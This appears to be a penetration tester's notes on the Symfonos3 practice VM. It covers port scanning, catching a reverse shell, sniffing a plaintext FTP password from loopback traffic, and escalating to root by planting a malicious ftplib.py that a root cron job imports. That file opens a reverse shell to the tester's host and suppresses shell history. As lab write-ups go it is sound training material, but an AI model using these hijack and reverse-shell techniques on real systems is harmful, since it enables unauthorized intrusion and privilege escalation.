# Symfonos3 Vuln VM

Kernel:
>Linux symfonos3 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u3 (2019-06-16) x86_64 GNU/Linux

## Nmap Scan
```
disastrpc notes 位 nmap -sV -sC -p- -T4 -oA nmap.allports 10.1.62.38                                                                                          
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-14 23:27 EST
Nmap scan report for 10.1.62.38
Host is up (0.00032s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.5b
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 cd:64:72:76:80:51:7b:a8:c7:fd:b2:66:fa:b6:98:0c (RSA)
|   256 74:e5:9a:5a:4c:16:90:ca:d8:f7:c7:78:e7:5a:86:81 (ECDSA)
|_  256 3c:e4:0b:b9:db:bf:01:8a:b7:9c:42:bc:cb:1e:41:6b (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.73 seconds
```


## Local Enumeration

Elevate shell

```
disastrpc symfonos3 位 nc -nlvp 4242
listening on [any] 4242 ...
connect to [10.1.62.33] from (UNKNOWN) [10.1.62.38] 38166

whoami
cerberus

python -c 'import pty; pty.spawn("/bin/bash");'
cerberus@symfonos3:/usr/lib/cgi-bin$ ^Z
[1]+  Stopped                 nc -nlvp 4242
disastrpc symfonos3 位 stty raw -echo
nc -nlvp 4242fonos3 位 
             reset
reset: unknown terminal type unknown
Terminal type? ^C
cerberus@symfonos3:/usr/lib/cgi-bin$ export TERM=tmux-256color
cerberus@symfonos3:/usr/lib/cgi-bin$ export SHELL=/bin/bash
cerberus@symfonos3:/usr/lib/cgi-bin$ stty rows 39 columns 157
```

Findinds 
- .nano in /home/hades ??

Hades logged in to FTPD:

```
hades    ftpd22105    localhost        Sat Jul 20 03:47 - 03:47  (00:00)
hades    ftpd22075    localhost        Sat Jul 20 03:44 - 03:44  (00:00)
hades    ftpd22070    localhost        Sat Jul 20 03:43 - 03:43  (00:00)
```

It seems user hades signs in to the ftpd serber periodically
ProFTPD is running as hades
>hades      370  0.0  0.4 124600  3716 ?        Ss   Nov14   0:00 proftpd: (accepting connections)

Check:
/var/log/proftpd/xferlog
/var/log/proftpd/proftpd.log

## TCPDump PAcket Cature

tcpdump is installed on the system, we run a scan on localhost and output to a pcap file.

>/usr/sbin/tcpdump -i lo -w /tmp/symfonos3.pcap

Reading the pcap file reveals the FTP credentials for the user *hades*:

```
...
07:20:01.566942 IP localhost.ftp > localhost.60686: Flags [P.], seq 56:89, ack 13, win 342, options [nop,nop,TS val 1016096 ecr 1016094], length 33: FTP: 331 Password required for hades
07:20:01.566968 IP localhost.60686 > localhost.ftp: Flags [P.], seq 13:36, ack 89, win 342, options [nop,nop,TS val 1016096 ecr 1016096], length 23: FTP: PASS PTpZTfU4vxgzvRBE
07:20:01.575017 IP localhost.ftp > localhost.60686: Flags [P.], seq 89:115, ack 36, win 342, options [nop,nop,TS val 1016096 ecr 1016096], length 26: FTP: 230 User hades logged in
07:20:01.575053 IP localhost.60686 > localhost.ftp: Flags [P.], seq 36:51, ack 115, win 342, options [nop,nop,TS val 1016096 ecr 1016096], length 15: FTP: CWD /srv/ftp/
07:20:01.575166 IP localhost.ftp > localhost.60686: Flags [P.], seq 115:143, ack 51, win 342, options [nop,nop,TS val 1016096 ecr 1016096], length 28: FTP: 250 CWD command successful
...
```

hades:PTpZTfU4vxgzvRBE

## su to user hades

```
cerberus@symfonos3:/tmp$ su hades
Password: 
hades@symfonos3:/tmp$ 
```

- apache ver 2.4.25 - try CVE-2019-0211
- base64 is available
- disk called "disk", try mount?
- group gods files:   
```
Group gods:   
/usr/lib/python2.7   
/usr/lib/python2.7/numbers.py 
/usr/lib/python2.7/mailbox.py
/usr/lib/python2.7/plistlib.pyc
/usr/lib/python2.7/pydoc.pyc
/usr/lib/python2.7/SimpleHTTPServer.py
#)You_can_write_even_more_files_inside_last_directory                
/etc/python2.7/sitecustomize.py 
```
- readable hashes from linpeas?

python lib hijacking?
we have writable access to the python2.7 lib folder:
>/usr/lib/python2.7

pspy64 reveals ftp script:
```
2020/11/17 08:32:01 CMD: UID=0    PID=21241  | /bin/sh -c /usr/bin/curl --silent -I 127.0.0.1 > /opt/ftpclient/statuscheck.txt 
2020/11/17 08:32:01 CMD: UID=0    PID=21242  | /bin/sh -c /usr/bin/python2.7 /opt/ftpclient/ftpclient.py
```

*/opt/ftpclient/ftpclient.py* script which imports *ftplib*:

```
import ftplib

ftp = ftplib.FTP('127.0.0.1')
ftp.login(user='hades', passwd='PTpZTfU4vxgzvRBE')

ftp.cwd('/srv/ftp/')

def upload():
    filename = '/opt/client/statuscheck.txt'
    ftp.storbinary('STOR '+filename, open(filename, 'rb'))
    ftp.quit()

upload()
```

python2.7 path:
```
hades@symfonos3:/tmp$ python2.7 -c "import sys; print '\n'.join(sys.path)"

/usr/lib/python2.7
/usr/lib/python2.7/plat-x86_64-linux-gnu
/usr/lib/python2.7/lib-tk
/usr/lib/python2.7/lib-old
/usr/lib/python2.7/lib-dynload
/usr/local/lib/python2.7/dist-packages
/usr/lib/python2.7/dist-packages
```

Evil *ftplib.py* library:
```
import os, pty, socket

class FTP:

    def login(self):
        return
    def cwd(self):
        return
    def storbinary(self):
        return
    def quit(self):
        return

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.1.62.33", 4240))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
os.putenv("HISTFILE",'/dev/null')
pty.spawn("/bin/bash")
s.close()
```